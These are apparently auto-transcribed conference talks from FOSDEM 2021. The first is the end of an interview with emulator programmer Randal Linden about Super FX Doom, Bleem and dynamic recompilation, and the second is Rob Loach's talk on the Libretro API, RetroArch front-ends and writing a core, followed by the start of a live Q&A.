four years. So it's all very tricky to fit. Anyway, you just said the word Super Nintendo again. I keep forgetting to ask the question, but you mentioned, or I read it somewhere that for the Super FX chip, when you were doing doom, there were no development systems available. Yes. So how did, how did they expect you to reasonably do a job there? Well, they didn't. Oh. So we received at Sculptured. Sculptured received the, here's the list of op codes. But Nintendo was still developing the development system itself and they didn't really make it available. And so I came up with the idea of, hey, let's hack the Star Fox cartridge. Let's replace the ROM with RAM. I mentioned this, right? Yeah, it was, it was literally a big breadboard with RAM on it and a little tiny boot ROM. And I wrote an interface that connected between the joystick ports. It was a serial protocol. So it was only two or three bits. And then I was working on the joystick ports on the Super Nintendo and the Amiga parallel port. The whole development system was all done on Amiga. So that's why when I released the source code to the Super Nintendo version of doom, I released the development tools as well, but they're all compiled for the Amiga but if you've got when you a e. It actually builds. It's a nice thing. So they did not expect you to properly do that. No, no, they didn't. At the end, towards the end of development when I had had the prototype operational. Nintendo sent over a custom hardware development system. It was a big box that had the super effects chip inside of it. Did that help at all or were you finished with that? Oh yeah. Yeah, yeah. Oh yeah. Immensely. But it took a lot of work to get it operational. It was a SCSI based interface. And I had a SCSI card on my Amiga and so I had to write low level I had to reverse had to reverse engineer Nintendo's development system. In order to make it work with my development system. And when that was done, it was possible to complete the project. I think it was quite well received as well. Have you ever worked not only in the Nintendo area, but you ever worked with any of the later enhancement chips like the DSP series. No, nothing. Yeah, my experience was just limited to the super effects. Gotcha. Okay. So audience questions. If you want to chime in just go ahead. You're here now. No, no, no. Great questions. Great questions. Let's see other people that are pleasure of asking and answering and getting this. This is a quite a valuable question. You asked one was if you friend look at give us a one on one. What's done. I reckon it's exactly. Yeah, we had a couple of discussions yesterday and some people talked about it and, and, you know, we were interested in, you know, how to get people, you know, started there actually, and what it is and how it works that kind of stuff right so. Okay. Well, typically, an emulator is an, an interpreted emulator, which means that you've got your program. And sort of like the way the processor works, you read one instruction. You figure out what the instruction is, and then you perform the operation so it might be addition, it might be subtraction, it might be exclusive or, but you do it one step at a time by reading the instruction from from the memory, interpreting it. That's why it's called an interpretive emulator, and then running code that does the actual operation. A recompiling emulator can be generally one of two forms ahead of time, where basically you take the program as a whole. And you translate instead of interpreting each opcode reading one opcode interpreting it, and then performing the operation, you translate it it's sort of like taking a book and translating the book into a different language you start at the beginning at the very first word of the very first page. And you translate word for word, and you translate from from one language like English into another one like, and say. And then you've got a book that's completely on call say, which you can read a dynamic compiler. Does this translation, instead of doing it ahead of time, it does it word for word, while the program is actually running. The dynamic recompiler will dynamically as the program is executing, instead of interpreting each opcode, it will translate from English to French, as somebody speaking it's sort of like having a translator in between the two processors. And then you've got the original code that was written in one language like MIPSR 3000. You've got the program which is the emulator, and it translates while the program is actually doing the running and the operation. And the dynamic recompiler is at the end stage is where you've got an optimizing recompiler, where, if you've got multiple sequences of operations, the dynamic recompiler can see the data flow where data is going sources and destinations and what kind of operations are being performed. And it can combine these operations together. And then you can do multiple certain operations like multiplying by zero always gives you a zero so you can skip the step of doing the multiplication. So, sort of an obscure example but there are cases like that, where if your original language has an instruction for addition. A translated language might have multiple ways of doing addition. If you only want to add one. Usually there's an opcode to increment. And that opcode is a smaller more efficient opcode because it knows that it's only going to be incrementing by one. So you can see, oh, this, this one processor has an addition instruction and it's adding one. So instead of writing the generic translation of using the addition in the target processor of adding the value one, I'm going to use the increment instruction instead and so it ends up generating optimized version of the original code. Does that sort of help flipping a single bit instead of doing the whole generic. Instead of adding generically, it can use the special opcode which is typically a smaller opcode to increment. That makes sense. A couple of years ago they had at the first time they had a talk. I think they were doing research about something called super optimization. I've never heard about it before. It's, it's, it's what you just, you know, the last part you just explained that but on steroids. And I couldn't really see it working in real life, maybe for small snippets of code, right. It does. No, no, but what they did know what you mentioned. Okay, that I believe but what they did that was like brute forcing all the, all the possibilities and then seeing which ones are the best, you know, and then using that type of code and speculative stuff. Yeah, but the way they explain it was very interesting. Yeah, research university stuff so cool stuff. Yes. Sorry. I'm going to jump right in here again. Sure. Which assembly giant likes. Have you enjoyed the most. Good question. That's a good question. I think by far my favorite is arm. Assembly. Original on assembly, because, well, it's a toss up. I've enjoyed super effects, the GSU to because it's it's sort of a largely a risk processor. And as it can combine it's like the arm processor that they're very, very similar. The arm processor can take multiple source operands do an operation and put the result into a destination register. So you can do things like take one number in a register, add it to another register that is shifted by a certain number of bits, combine the result and store it in a third destination register, all in one opcode. So it's very, very powerful. That's why arm is used in most cell phones in most handhelds in low powered devices, because it's it's a very, very, very powerful instruction set that is also very compact. Yeah, so I'd have to say definitely it's a it's a tie between arm and the super effects GSU because it also could do similar kinds of operations you could see from this source with another source register so you had to operation to source operations, combine the result and store it into a third destination register, very, very elegant. To be honest, I have expected you to say 6502, but oh I'd like 6502. Really a dialect of course but I like 6502, but I think that arm and the super effects are just so much more powerful. So you got 6502 and 650816 because they're simple. You've really you've got three registers you've got your accumulator you've got your your x index, and you've got your your y index, but on the arm processor you got 15 registers you've got all these registers, and on the super effects you've got 15 registers. There's a lot of flexibility. And, and it's nice because it allows you to do some very, very powerful things these days compilers take care of that for you. You write your C code and the compiler generates really nice optimized code, but back then the, the, the average programmer, who was an assembly language programmer could out optimize a compiler. And these days that's not really the case anymore. I see I see in a comment here, I guess the answer would include Motorola 68 K or is that 80 perhaps right so. Yes, it would I like I like 68,000. I think 68,000 is a little more cumbersome. But loved the Amiga Amiga is is, I think, by far one of my my favorite platforms ever. I've done 68,000 for sure. Yes, and I've done very, very little z80. Z80 is one of the one of the very, very popular processors that I don't have very much experience with. Yes, also very popular at this conference. So, yes, today alone there were like three or four talks and yesterday it was mentioned a couple of times it's generally very, very popular at Fossum so. Oh yeah. Alright, sorry, Neil's take it away. Let's see what else I have. I was looking at the bleemannual. Yes, since I have it here now. And one of the things on page 22, it says a game that used to work fine is now freaking out. If you're, if you're getting random graphic glitches in games that normally render fine. It usually means memory has gotten stepped on somewhere. I don't know, you could explain what that is. I'm not quite sure. It has been so long since I've seen that marketing language right so that's that's marketing speak. Yes. I don't even know what to say. Well, then we'll leave it at that. I just want to say that this is really nicely written. David, David Herplzheimer, my business partner from BLEEM did that. He did. He did all the graphics. He did all the marketing and the sales and oh yeah. When people think of BLEEM they think of the emulator. The emulator was just one small part. There was a lot of people that, like I said, like David or like Will Kep or Scott or John Hengartner, our attorneys who made BLEEM possible. I'll highlight another thing that I really like and then we'll get back to the questions on page 5 launching BLEEM because we know you're probably not even reading this. We hate manuals too. We've preconfigured BLEEM to let you start playing right away. It's all really nice and I also saw somewhere like an advertisement. It says 400 new games for your dream cost. Yes. It's just really, really nice. Whoever thought of those things. Yes. An audience question again from C Creighton. A question from an uninitiated about the Dynarec. Do you take into consideration the timing of certain operations and how? Yes and no. For BLEEM, BLEEM didn't really take into account that certain operations took longer than other operations. And so that caused potentially all sorts of issues. For example, multiplication is typically an operation that takes more than one clock cycle. But on BLEEM, multiplication wouldn't necessarily take more than one clock cycle, depending on the processor that it was running on. And so there were estimates of how long each operation should take. But BLEEM wasn't cycle accurate. And so it didn't really take into account things like latency and hardware latches and op codes that took multiple clock cycles. I think that answers it. I have a relay question. I want to run PS5 games on my PC. Where do I begin? You relay that from yourself, Nils. Yes. Where do you begin? Okay, so get a big PC case and empty out the PC. Put the PlayStation 5 inside it. Close it up again. So just give up, basically. Well, at the moment, give up. Maybe go for PS4 first. Exactly. Go for PS4 first. Like I said, these days the machines are so complex and so fast that it usually takes a general, that was one of the, that was one of the things that was rare, I think about BLEEM, that the need for a generational leap wasn't quite there yet. So you could run on a reasonably low end PC, a PlayStation game that had all of these custom chips and custom hardware in it. These days PS5 and the new Xbox series are state of the art. So you could buy a very, very high end PC to run games comparably. And to emulate them, I think that that's probably a couple of years out. I'm seeing some comments here, because this is something that's, you know, people discuss this a lot is because most of the hardware of the new Xbox and PlayStation 5, it's all x86. Yes, it's all x86. I'm pretty sure that it's Ryzen. Yeah, I think so, yeah. Yeah. So the assumption is usually it should be actually easier to implement. Yes, emulate right so. Yes. Yeah, I would agree. The, the, it should be easier. I think that especially, as I said, games these days are writing to a higher level API. You're not writing to the low level hardware as much. And so I think that emulation of later systems is in fact easier to use an example for the Dreamcast. I would personally were I to write a Dreamcast emulator, I wouldn't emulate all of the Dreamcast hardware. I would emulate the software libraries, because all the developers have to use the software libraries. And so if you, if you knew that the software libraries were there. You would use the software libraries and do the same kind of enhancements that Blean does for Dreamcast games on PC. Oh, sorry, I was muted because my neighbor is drilling because he likes to drill. So, but because you just mentioned PlayStation 4. Have you looked at any of the, I don't know how many places for emulator projects are but there are I think at least two. So have you looked at any of those. Have it looked at them at all. And this is another curiosity of me back in the day after BLEEM, well, you know, after Sony happened, did you at any point, sorry, take a look at the EPSX or PCSX or the other PlayStation emulators that were coming up around. And no, I know that PlayStation emulation has come a long way since BLEEM by far, but never really looked at the other the other emulators that were out there. Here's a question I shouldn't forget. If I can interject again. Yeah. What does BLEEM mean? That's a good question. Okay, you're ready for the answer. I think so. BLEEM doesn't mean anything. I know disappointing, but BLEEM has no meaning. It's just a made up word. It's not best little emulator ever. No, it's not best little emulator ever. It literally has no meaning. I was asked this. Once many, many years ago. And so now, now the world knows BLEEM really doesn't have a meaning. This is a big highlights, I think. Where did, where did the whole thing come from the whole best little emulator ever made? I don't know. A number of people. There was a big question around what, what did it mean? And I wouldn't tell anybody that it didn't mean that doesn't mean anything. And so people started coming up with acronyms. I think it was from an article because there was an article. It was titled best little emulator ever. It was very popular. So that's at least where I got the name from. I know it's not an official name because it wasn't in any of the documentation, but exactly. But yeah, so you've held on to that quite long. Yes, yes. Since we first released, way back in 1998, 99, something like that. Yeah. I think you've been programming longer than I've been alive. And there's a good question here. No. From Pegasus again, you mentioned the organized your organized person. Would you care to share any organization tips if you have anything? Good. Good question. I'm an organized person. You have to sort of be when you're, when you're looking at code, when you're designing code, when you're architecting. They, they say for a carpenter measure twice cut once with programming. The best advice I could give is don't start typing. A lot of people are anxious to, to get into programming and start typing and get some results. But what you'll hit is what is typically known as the 80 20 rule. It takes 20% of the time to get 80% of the way there. It's another 80% of the time to get to your 20% to finish something off. So by being organized by, by making notes, by thinking things through carefully by considering possible alternatives. And in the long run, we'll save you coding. It's rare that it's rare that I'm happy with with. I don't want to say that I'm unhappy with the code that I've written. But there's always room for improvement. There's always better code. And so I always come across different ways of doing things. And, and that's one advantage of having taken notes. I can look back at my notes and think, oh yeah. This was another way of doing something. I also keep what I call a to do file. It's literally just a text file. And so when I think of something, I put it in my to do file, and then I come back to it later and sometimes things never end up getting implemented. But, but other times, it allows me time to think about how I would go about doing something. And then I come back to it afterwards. And I just say one thing because I do both the notes and the to do file and I can neither understand my notes or understand my to do files. But, but, but on the more serious side, because you know, we talked about, you know, how your code was documented, especially the doom code or doom code, right. And I wanted to ask something, because this is always a discussion in the programming world. So do you start with documentation or start with code. I actually document while I'm coding. I once remember writing some code and somebody was watching me as I type I'm a fast type is I can do typically 140 words a minute. I mean, you program assembly, you have to be a fast like this. Otherwise, you would be a program for years. Exactly. Exactly. So I'm a very, very fast coder. But I will typically know what I want to accomplish before I actually go ahead and start typing. So that when I'm typing, I'm typing and I'm commenting at the same time. A lot of the the the doom for super effects code is a good example. And I've gotten better at code coding and documenting since then. But, in inevitably, you'll end up going back and having to modify code or change code. And I've found that every so often I'll write something that's complicated, and then I'll have to go back to it. And even though it's complicated because I've documented what's going on or my thought process as part of the code itself. It makes it possible for me to add some new feature or or make some change that's that's necessary. In the past when I thought to myself, oh, I'll just whip something up and get it running and then I'll tweak it later. Invariably, I end up having to rewrite the code because it it it worked for what I wanted it to do. But I've often found that the code rarely is in a fixed state you sort of you, you know what you want to accomplish. If you've accomplished it, there's always something that in the future you come back to check. Yeah, actually, this relates to the final prepared question that I had. And after that, it's just silly things. So you released the doom effects code on the GitHub and I had a look and it looks really neat. And I was wondering how much like tidying up that you do or was it just this is this was the code and you released it as is. I released the code as is nice. Yeah, thank you. Yeah, a couple of people have commented on some some people that I respect very much. Like Becky Heineman, Bard's Tale. She did do them for the 3DO. Somebody that I respect tremendously has looked at the code and she said wow it's very nice and it's well organized and it's a real tight code base. Yeah, I literally took the code as is and put it out there. We keep getting back to doom so I want to ask something very quick while Neil's finding the question. No, because you know, because you basically reverse engineer doom to implement it. So because there's a lot of stories back then about somebody just emailing it. Hey guys I want to port doom to whatever, and they get a reply with the source code so why didn't that happen for you guys. Or did you try that. I don't know how did that. I basically wrote the development system and worked on the the the platform that was used by another team that was writing dirt tracks effects. And while they were working on that in my spare time. I was working on doom. And I came into Sculptured one day and I had a prototype that was fully operational and I said, here it is. Let's approach in software and see if they're interested. I have a comment from somebody that is writer when you were talking about the documentation he commented, literally programming is it's not. Then I asked him, you mean like the Knuth concept and he said yes. So are you familiar with that concept. I'm not. I'm not familiar with it what what what is it. Yeah, I'm not quite about this actually. Sorry. I know quite a bit about this subject actually take it away. I'm interested. I love learning something new all the time. So check out what Knuth wrote about it. But the nicest thing that I know is usually the code will contain, for example, markdown format format its documentation. And you'll be reading the markdown file, like for example in your browser, and I will say by the way, this code can be executed, because it's also the source code for the program. And just the blocks of documentation they're just separated. And then sort of we've all the source code together at the end and you can just run it but it's the same file which is beautiful I think. Yes, my code. If you see my code, it is very much like that it's sort of the comments describe the flow in general. And then, in addition, on specific lines of code, I describe the specifics of why I'm doing certain things, but I'll also have big blocks of here's the, you know, what this huge block of code is about to do. And here's a couple of steps that it's going to take and then in the code itself there'll be additional comments on individual steps, especially if the steps are, like I said, with arm assembly where you can do a bunch of complicated operations. Also avoid magic numbers. Avoid sticking constants in your code always have them as definitions equate some things like that. That's another, just another useful tip. Yes, exactly. And at the end of that discussion. Yeah, I have to add something because, you know, I can't help myself but I mean because somebody with with your, how do I say this nicely with your affinity for precision you know and for for for detail and such. I mean, why would you program an assembly I mean right definition assembly is not really the most readable language on the planet right so it was largely a function of requirements. Especially with a project like BLEEM, or like Cyboyd. The target platform was such that assembly was the only way to really accomplish what needed to be done. You could write it you can write in C these days a dynamic optimizing recompiler. Absolutely. But back then when your target hardware was a Pentium 100 with with a voodoo 3D effects graphics card. It's such a low end machine that writing an assembly was really the only way to do it I got my start writing in 6502 on the Commodore 64. And just stuck with it. These days, it is an absolute pleasure to write in C sharp. You
|
In this interview/conversation, acclaimed emulator programmer Randal Linden takes us on a journey down the depths of reverse engineering and emulator development. Rather than editing this conversation to fit a smaller time-slot, it is split across 3 parts, with a Live Q&A at the end of part 3. Part 3 highlights: Windows 95 Bleemcast! Learning reverse & emulator engineering
|
10.5446/53645 (DOI)
|
Hello and welcome to Libretro, one API to bring them all. This is for the Fostum 2021 conference. I'm so excited to be here. My name is Rob Loach and today we'll be covering everything about RetroArch, Libretro, and the modularization that it brings to the table. Since Fostum has gone remote, if you have any questions, definitely write them down and come prepared to the live Q&A later on. Or simply yell at me on Twitter. It's always fun. So, as I mentioned, my name is Rob Loach. I am part of the Libretro team members. I'm a web nerd and open source evangelist. I've been in the web industry for about 15 years and have always loved game development and retro video games. I'm Rob Loach on Twitter, GitHub, and YouTube, so feel free to reach out to me there. But I am not the only one who's represented in this presentation. I want to make a big shout out to the Libretro theme. It spans across about 15 people and more. We depend on lots of contributions. For this talk, I do want to shout out TwinFX, Gouchi, Gadsby, and Kivitor for their help and contribution to these slides. Libretro is available at libretro.com. So check that out. And with that, let's talk about emulation. There are so many emulators out there. It's absolutely incredible to see how far it's come over the past few years. Being able to run older software on new hardware is essential in order for archival and digital preservation. There's Dolphin for Gamecube and Wii, PCSX2 for PlayStation 2 emulation, PPSSPP for PlayStation Portable, Desmune for DS, Nostopia, FCEUX for Nintendo. It goes on and on and on. There's so many emulators out there, and it's so exciting to see. And even outside the emulation world, there's also a whole bunch of game frameworks out there, and engines like Pico 8 or Doom with PR Boom, Scum VM for all of the amazing classic adventure games, and even more, even more. But this causes a problem for users. As a user, it can be cumbersome to set up all of the different emulators. Each application has its own settings, input configuration, graphical user interface. So it can be difficult for new users to set up all of these different applications for each system. And in addition, it's also difficult for emulation developers. It's cumbersome to have to manage your own window, your own window logic, input, video, and audio playback. On top of that, how can you guarantee that your application will run well across different platforms? There's Windows, Mac OS, Linux on the desktop. What about mobile? Can you run your application on the web? How about smaller hardware like the Raspberry Pi? There are a lot of things to consider when you're developing your own emulator. So along comes Libretro. Yeah, and this talk will be covering what it means to be a Libretro front-end. We'll also be talking about what Libretro cores are, the Libretro API is covering some of the basics of that, and the ecosystem surrounding Libretro. So let's talk through some of the front-ends involved. A front-end is essentially a program that implements the Libretro API and interacts with Libretro cores. There are a bunch of front-ends out there that can interact with Libretro cores, and I'll talk about some of those here. The first one up on the list is RetroArch. It's the primary reference for Libretro. It's available on Windows, Mac, Linux, Raspberry Pi, Android, iOS. There's a slew of different platforms that run RetroArch. So head over to RetroArch.com to see if it's available for your platform. Some of the favorite features that I have for RetroArch are NetPlay. Being able to run Retro video games through NetPlay brings a lot of the memories of Couch Co-op and Couch Multiplayer. I love that. Being able to play Retro video games over the Internet is pretty awesome. Rewind is really cool. It lets you, in real time, reverse actions that you have taken in games. If you misallege in Mario or something, just rewind a couple seconds and try again. So cool. Input run-ahead is also really, really awesome. When you're playing a game, it will take your input and apply those inputs to previous frames. So it gives you the illusion of reduced input lag. It just feels so much more responsive when you hit a jump button and it instantly happens. Really awesome to see. And on the web, you can run RetroArch through the web using M-scripten. Just head over to web.retroarch.com and you'll see there's not as many features as the desktop application, but it's awesome to be able to run some of these cores on the web. LACA is awesome. LACA is a Linux distribution based off of LibraElec. I think that's what it's called. And it makes it so that when you boot up the device, it instantly goes into RetroArch. What makes it unique is that it runs on so many different devices, from the desktop to small CPU boards, like the Raspberry Pi or the Odroid, to even handheld devices like the RetroFlag GPi case. LACA is an awesome solution for that. So I highly recommend you check it out. Ludo. Ludo was written in Go. Its aim is to keep the most basic features to allow other people to learn how to design and build their own front end from scratch. I love how snappy and simplistic it is. It's very easy to load it up and get a sense of how to add your content to it and use it. Again, very basic, minimal front end. Great for ease of use. And speaking of ease of use, Nome Games is an interesting one. It's focused on the Nome environment. And having it just focused on that desktop environment means that it can take really great advantage of the environment itself. It's very easy to use. The user interface is very stripped down. And it's still relatively early on in the Nome Games development cycle too. So have a look if you have any ideas on what should be implemented as part of it. I also wanted to make a shout out for Kodi. Kodi's been doing some really interesting things with their retro player. Some examples of how cool this is is that you can just in your own media center in Kodi, you can add your own games library and then browse them directly using your controller. And it's awesome. Still very early on as well. But I just wanted to make a shout out to Kodi and retro player. There's even more front ends available as well. Arcane is a desktop environment that brings libretro directly into the Linux distribution. Actually, I'm not sure if it's a Linux distribution. Someone will have to correct me on that. You let me on Twitter or something if I'm getting that wrong, but I just love seeing libretro used in places outside of just a single application. Bizhawk is heavily used in the tool assisted speed run community. MU VR is a virtual reality application that you can when you enter this virtual reality, you're, you're sitting in front of a CRT TV, which I just love. I love that. And Lemmy Roy is a is a Andrew Android based open source application project. Which really adopts some of the graphical user interface features around Android. So it fits seamlessly in a mobile setting. So that's that's it on front ends. But what are what are libretro course? A libretro core is a program that exposes the meat of their application through the libretro API as a dynamically linked library. And all these applications can have their own standalone implementation. This dynamically linked library allows front ends to use the libretro API to interact with them in a modularized fashion. There are a number of cores out there, split across a few different categories. I'll just cover emulators media players and game engines or game frameworks for this, this talk. Some of my favorite emulators out there. I'd like to shout out mess in for Ness. There's Higgin for SNES, MGBA for Game Boy Advanced, Parallel for N64, PXSX2 for PlayStation 2. These are just a few examples of emulators that have created libretro cores. And while the standalone application exists, the libretro core allows libretro front ends to use them. DOSBox here is also one of the most recent cores added to the list list and it kind of blows my mind. It gives you the ability to load DOS games directly from a zip file, adds cheat support, having the ability to rewind directly in a DOS game is hilarious to see as well. So cool, you should definitely check it out. So while many people know libretro and retro arch for emulators, it goes beyond emulators. You can also use it to load media through some of the media libretro cores out there. And since you can load up video files, you get advantage of using some of the features that retro arch gives you, like shaders. In this example here, you can see we're applying a VHS filter to BigBuckBunny. Really cool, I like that. I like VHSs. Anyways, outside of media and emulators, there's also a whole slew of different game engines and game frameworks that implement libretro cores. One of the benchmarks for hardware is does it run doom? Well, yes, with libretro, libretro has a PR boom core so you can run doom through any libretro front end. There's also a scumvm core. I grew up loving Monkey Island, so the scumvm core is definitely one of my favorites. And if you're looking for a game to play, CaveStore, I definitely recommend CaveStore. It's a beautiful and fun metroidvania made by Pixel. And it's free. The libretro core for it is open source as well, so you can download it directly through the content downloader. And TIC80 is a small 2D game development framework. Many people use it to prototype some small games with it. I built the libretro core for TIC80 and having to be able to run my own games on a handheld device, it's just so gratifying, so cool. So I made this, I'm in the way of here, here, I made this dangerous Dave game in TIC80 and you can run that through the libretro core for it. So yeah, really cool. So how does all of this work? How can you create your own libretro core? Well, I could speak about this for hours. I'm only going to cover the basics of setting up a dynamically linked library with libretro. I'm going to talk about some of the libretro callbacks, video rendering, input checking, and audio concepts. Yeah, so let's get into some of those. So a libretro core is essentially a dynamically linked compiled library that implements the libretro.h header file. It takes function declarations from libretro.h and defines those functions as callbacks so that frontends can call them. Libretro provides a standard make file that you can use. A make file is essentially just a definition file of how a program should be compiled. There's many different uses of it. The libretro make file is pretty standard. It lets you compile for all of these different platforms. So that's one that I use heavily. In the examples that we'll be talking about here, we will be talking about making a potatoes core. Yes, potatoes. So if we're setting up a potatoes core, the first thing that you'll need to do is create a potatoes.c file and define the retro get system info callback. When a front end boots up a libretro core, it will call this function just to acquire some information about what the core is. Like the library name. In this case, we have potatoes as the library name, the core name. We're also defining the version, any valid extensions. Also in this case, we'll be loading.potato files. And what happens when we start to run and load this core? All the libretro front ends will call the retro init function. And in this function, you would put any initialization that you have for your core. And there's also an environment callback that's called as well. Retro set environment will send you an environment function that you can call to grab information from the front end. In this case, we are setting that the core does not need a game to load. So in this case, it will just run the core. It doesn't need a game to load. But if you are loading a game, you can use the retro load game callback. It takes one of two things. It either grabs a data buffer or a direct path to the content that you're loading. Yeah. And there's also retro unload game as well for when the core is loading. And you want to close it. So what does this look like if we're to run it? When you run a core, it repeatedly calls the retro underscore run callback. And in that callback, you're expected to update the game logic, update any input that you have, display the game, maybe play some audio. But what does it look like if we're to run it like this? If we compile our potatoes.c file into a Pidotos.so or DLL file, what does it look like? If we're to run it with retro-r-l-potatoes.so or potatoes.dll, it looks like this. We have a blank black file. That's so exciting. We're making progress. But yeah, let's get some video happening here. Video is really important. So if we're wanting to display something in our core, we use the retro get system AV info callback. This will set up how many frames per second that retro run callback will be called. In this case, we're setting it to 60. So 60 frames a second. We're also setting the width and height of the core as well. How the video will be shown. In this case, 320 by 240 is good. And I've linked, you can't see it right now, but there's a lot of different things that we can do. But there's a link to the libretro samples repository that has a whole bunch of the samples that I'm talking about here. So head over to there, the libretro samples repo. So now that we have our audio and video information set, what we can do is render our content. So in this case, we will be rendering a checkered board. Yeah, it goes line by line and sets the pixels into a frame buffer. In this case, the frame buffer is a unsigned integer taking up 32 bytes. Every byte represents a or four bytes rather, and every byte will represent a color pixel value. There's a once we set up the frame buffer, we send it off to the video callback function. So what does this look like when we run it? When we run this core, we have two options, we either load it directly through the interface using the load core function, or we run it through the command line. In this case, I ran retroarch dash L and then potatoes.so, just like we saw before. So what does it look like? Hey, we have a checkered board. Yeah, it's really gratifying to see something actually happened on the screen in our core. So check it out. The lib retro samples will have all of this code available. And what about what about input? We talked about video. What about input? We use the retro set input poll function. And this will set our poll function to when we call it the front end will update any input that's required. And then following that there's the input state callback. And this input state callback will tell us information about the input. So in this case, we're checking if the up button is pressed on our on our gamepad. And if it is, we can do something like move the potato up, which is very exciting. All lib retro cores, they support joy pads, the mouse keyboards, touch pointers as well. So really cool. Audio is supported as well. In this example, we are calling the audio callback with a with a solid tone. Let me see if I can get this running so that you can hear it. It's just a solid tone, but let's see if this works. So I just compiled our core. It's not on the screen, but I just compiled it. Now I'll run it. Hopefully you'll see a hear a sound. Solid sound. I like that. Very cool. So that's essentially creating your own sound a solid tone. And every frame this is called. So you have to set up the set up the audio to do it. And there's some audio cores out there that you can use as samples. You can load an MP3 file into this this audio buffer and then play the MP3. It's up to you. So beyond audio, video and input, what are some other concepts that we can accomplish with the Liberator API. Some of my favorites include serialization with serialization. What you do is load all of the game state, everything about the current state of the running core, you can load that into a serialized object. And that allows front ends like retro arch to handle state saves. It's also what's used for net play as well and input run ahead. So once you implement the serialized serialized buffer, that allows your core to have save slots, which is really cool. So rendering as well. Sheets are in there with retro sheet set memory manipulation. You can also unlock your frame rate. In our potatoes example we were running at 60 frames a second, but you can unlock the frame rate. There's also a virtual file system as part of Liberator.h. Check it out. Send messages directly to the front end so it appears as a message. Yeah. And Liberator API, it also, there's many different implementations, different implementations, different integrations with different languages and platforms. There's C++, there's Rust, there's Go. People have made a Pascal game, Pascal? Is that how you say it? Yeah. On implemented in Pascal. And check out the Liberator samples repo again. Definitely go and try making your own integrations. Like Node.js or M-scripten definitely reach out to me. I've been very interested in the website of this lately as well. So beyond the front end's cores and Liberator API, what does the ecosystem around Liberator look like? I'll be speaking about assets, the joy pads, auto-config, the database system and the build bot right here. So the assets. Retro-H comes with so many different assets associated with it. There's themes, there's overlays that people apply, different wallpapers, even audio for the menus. There's so many different assets that people need and a lot of these are contributed from users. So definitely get involved with the asset systems. There's also auto-config. When you plug in a gamepad, when you plug in a gamepad, Retro-H will automatically search all of the device and product IDs in the auto-config and configure your joypad for you. There's so many different gamepads out there. So if you have a unique one that is not auto-configured with Retro-H, definitely get involved with the Retro-H joypad auto-config. We'll add it and then you won't have to configure your device. It'll just do it for you. There's also the database system. In Retro-H you can scan content and it'll automatically add it into playlists for you. It's based on the CRC or the serial if it's disk media. Once those are defined as part of the database, Retro-H can scan the content and automatically add it in the playlist. So if there's some content that's missing, certainly visit the Libretro database repository and make an issue. We can add it in. And the Buildbot. The Buildbot is awesome. I love the Buildbot. It's a continuous integration server to build Retro-H in all of its cores. There's a new infrastructure for it as well. It's just so much faster. Big thanks to M4XW who really led that effort. It automatically builds Retro-H for Windows, for Android, for M-Scripten, Mac OS. Yeah, it's pretty amazing. And there will be a new blog post coming up within the next month detailing everything about the Buildbot. So stay tuned for that. So what's next for Libretro? We've covered front-ends, what a Libretro core is, how to make your own core, and some of the ecosystem. Since its inception as SSNES and LibSNES, Libretro has grown much beyond its upbringings. Libretro and Retro-H provide a way to connect different applications, emulators, and game engines together in a single application. So what's next for the project? We want to expand the Buildbot, finish the ARM Linux cores, Mac OS 64-bit binaries, and add more support for building more cores. We want to expand on the Steam release. The playtest is out, so keep watch for when you can get your own key to that. But we're looking to push that Steam release up. There's also the hardware support. LACA runs on so many different platforms and systems out there, but there's definitely more to come. And we also want to support your own cores. They're adding a Libretro core to your own application, expands the user base, allowing for more portability on different platforms, and it also gives you access to a larger developer base as well. So certainly work on adding Libretro cores to your own emulators and applications out there. So that's it for me today. Thank you so much for joining me to talk about Libretro. I want to make a shout out to Blackbeard334, TwinFX, Gatsby, and Kivitar for all of their help on setting up these slides. My name is Rob Loach. Definitely reach out to me on Twitter. I always love hearing interesting ways that people are using Libretro, so definitely give me a shout. I hope to publish more of these videos on YouTube as well, so let me know what you'd like to see. There will be a live Q&A session later on this week, so if you have any questions, reach out, queue them up, and we'll make it happen. Libretro and RetroArch are available at retroarch.com. They've been publishing some incredible videos on their YouTube channel as well, so check those out. And thank you to Fostum. This has been so exciting. I'm looking forward to seeing more talks this week, and it's been such an honor. So thank you so much. We'll see you soon. Bye. Yeah, I hope they have new booths, so how do you think over in the Q&A? I think we're going to be going into the Q&A now. Yeah, I think we're live now. Have a little time to play. I think we are live. Are we live? Yeah, we're live. We are live. Hello, everybody. Alright, so unfortunately Rob was not able to make it, but we are getting somebody else who will stand in for him. This is all very last minute. We're very happy to get this replacement's seat that works out. Bear with us for a moment as we invite him to the Matrix channel. I'm compiling all the questions that you've asked. I think we've also found a fix for the camera only tracking the moderators. See if that works. Yeah, I believe so. Okay, we have the stand-in Q&A speaker in the chance, not yet in the room. I'm going to have to read to grab a drink. Yeah, Sylvia, there's not too much to compile. I see. Can you hear me? Yes, I can. We're setting things up with the stand-in. Very, very last minute, so please bear with us and let's hope it works. I'm not sure if you can hear me, but it's already in the chat, and we're trying to get voice working or video or anything working. So we will publish Rob's address and you can send him your questions. And you finally have the Q&A thing working. The speaker's not there. We've got four questions. Rob just came online, so let's see if we can get Rob. Let's see if he responds. I think it's really early in the US, right? Yeah. It's like 8am, something like that. How much time do we have? Oh, there would be another 20 minutes. Neil, sing something or entertain our guests while we find Rob, please. You're going to poop me on the spot like that? Who else? I actually have some questions ready for Rob as well. I've been using this for, I don't even know how long, retro arch. I think the first advice I ran it on was a PSP or something. I can, I don't even know when. Hey, it's working. No way. Wow, that's great. I'm very happy to hear you, Rob. We found it. You were just about to make me sing some songs. So I'm actually, oh, you want to want to sing a song. I'm actually starting to get my throat actually starting to croak up a bit. So let's, let's skip the song. Okay, great. So everybody saw your talk. And, well, let's just dive straight into the questions, right? I'm just going to talk to bottom here. So I've got here a quick one. Will you port Libretto to the mega 65 with a wink at the end? Ooh, the mega 65 that would be amazing. There's a, it's actually really funny. It's hilarious to me to see people port retro arch and and like Libretto to crazy different embedded systems. I love it when I see, when I see it emulate itself as well as pretty fun, funny to see. Yeah, I'm always interested in seeing, seeing really crazy ports happen. Mega 65 I haven't, I haven't heard someone try it out but I'd love to see that happen. Would you be the guy to call or would it be somebody else? I think I've already started the porting processes for for lots of systems. I did port it to, I got, wait, let me see if I can find it. Thank you to the tick 80. Right. We're getting some new questions. I got it running on my on this on the retro flag GPI. It's pretty awesome. The, this is the retro flag GPI. It's running on a Raspberry Pi zero. So you can install Laka on it and then it just runs pretty awesome. But that's a really cheap one right the little five dollar one, I think. Yeah. Yeah, five dollars. The case was probably $40 ish. But once it's running, it's pretty awesome. Yeah, so you have the, the simple gooey up there. Oh yeah, 